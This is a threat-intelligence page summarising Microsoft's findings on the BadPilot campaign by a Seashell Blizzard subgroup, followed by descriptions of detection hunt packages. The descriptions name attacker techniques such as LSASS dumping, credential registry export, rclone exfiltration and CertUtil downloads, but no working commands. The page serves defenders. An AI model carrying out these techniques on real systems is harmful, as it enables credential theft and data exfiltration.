BadPilot Campaign | Intel 471 Skip to content

BadPilot Campaign

Feb 26, 2025
Homepage slide 1

Threat Overview - BadPilot Campaign

Researchers at Microsoft published an analysis of a subgroup within infamous Russian state-sponsored actor Seashell Blizzard conducting a campaign code named BadPilot since 2021. During this campaign, the subgroup compromised internet-facing infrastructure in order to gain and establish persistence to globally diverse high-value targets, including energy, telecommunications, shipping, arms manufacturing and international government entities. The threat actor initially concentrated their efforts on Ukraine and eventually expanded globally, targeting entities in the United States, United Kingdom, Canada and Australia. Seashell Blizzard expanding beyond their usual Eastern European activity is important that the community takes note of, as the threat group is considered highly sophisticated with a diverse spectrum of capabilities that consist of cyber espionage to the destruction of targeted systems. The subgroup conducting BadPilot has been observed to be exploiting known vulnerabilities, such as CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet FortiClient EMS), as well as abusing remote access tools such as Atera Agent and Splashtop Remote Services to maintain access. Due to the observed reach of the BadPilot campaign reaching a global scale, it is important that organizations prepare themselves and stay on top of the activity related to this subgroup going forward.

 

TITAN References: TITAN Profile Report: Seashell Blizzard

Related Hunt Package Collection: Seashell Blizzard Threat Group

Get your FREE Community Account today on the HUNTER471 Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

Suspicious BITS Activity - ScriptBlock

This package identifies activity in Powershell Logging associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in PowerShell.
ACCESS HUNT PACKAGE

 

Suspicious BITS Activity

This package identifies activity associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in powershell.
ACCESS HUNT PACKAGE

 

Single Character Batch Script File Executed on Endpoint

The provided logic looks for single character batch script (.bat) file names found in the command line arguments of a process execution. This is often malicious activity as single character script files are uncommon in an environment when executed for legitimate purposes.
ACCESS HUNT PACKAGE

 

Potential Exfiltration - Common Rclone Arguments

This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
ACCESS HUNT PACKAGE

 

CertUtil file download

Identify suspicious downloads with the built-in windows tool CertUtil. CertUtil is typically not utilized to download executables or files in general from the web, as such its usage to download files from the Internet should be considered suspicious.
ACCESS HUNT PACKAGE

 

Suspicious Change in File or Folder Ownership - Potential Sensitive File Access or Ransomware

This Threat Hunt package identifies the use of 'takeown.exe' to modify files ownership enabling further interaction with those files. This technique can be utilized by malware and ransomware in order to access sensitive files to steal or to unlock so they can be encrypted.
ACCESS HUNT PACKAGE

 

Methods for Downloading Files with PowerShell

This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
ACCESS HUNT PACKAGE

 

Remote Atera Agent Download - Command Line

This Threat Hunt package identifies when a tool like a lolbin is used to fetch the Atera's Remote Montoring and Management (RMM) agent directly from Atera's distribution domain.
ACCESS HUNT PACKAGE

 

Remote Atera Agent Download - Web

This Threat Hunt package identifies when the Atera's Remote Montoring and Management (RMM) agent is downloaded directly from Atera's distribution domain.
ACCESS HUNT PACKAGE

 

Attempted Credential Dump From Registry Via Reg.exe

This use case attempts to find execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.
ACCESS HUNT PACKAGE

 

Dump LSASS via Renamed procdump

Identify ProcDump usage as a means to dump LSASS data. ProcDump is a SysInternals tool that can be used to dump process memory, dumping the process memory of lsass.exe which can be used to obtain credentials.
ACCESS HUNT PACKAGE

Share this article
All Resources

Featured Content

Intel 471 Annual Threat Report 2024
Whitepapers
Intel 471 Annual Threat Report 2024 & Outlook for 2025
Intel 471 Logo 2024
News
New TgToxic Banking Trojan Variant Evolves with Anti-Analysis Upgrades
The evolution of Russian cybercrime thumbnail
Blog Articles
The evolution of Russian cybercrime
The evolution of Russian cybercrime thumbnail
Podcasts
The evolution of Russian cybercrime
Preview 4 to 3
Webinars
Threat Hunting Foundations Workshop: Moving Beyond IOCs to Behaviors and TTPs
Intel 471 Logo 2024
News
This Android banking trojan steals passwords to take over your accounts — and all it takes is a single text message
Featured Resource
Intel 471 Logo 2024

AresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism that was spotted recently in the wild.

© 2025 Intel 471  |  Privacy Policy  |  Terms of Service  |  End User Agreement  |  Modern Slavery and Human Trafficking Statement